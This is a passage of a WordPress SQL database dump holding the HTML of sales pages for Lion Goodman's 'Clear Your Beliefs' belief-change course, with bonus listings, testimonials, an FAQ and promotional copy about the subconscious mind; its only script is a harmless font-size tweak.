Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() { \r\nvar is_chrome = window.chrome; \r\n if (is_chrome) { \r\njQuery(''h5.hdr'').css(''text-size'', ''51px!important'');\r\n jQuery(''h5.hdr'').animate({\r\n    fontSize: ''51px''\r\n }, 100);\r\n } \r\n});\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 00:51:56', '2014-06-19 05:51:56', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1034, 2, '2014-06-19 01:01:32', '2014-06-19 06:01:32', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any 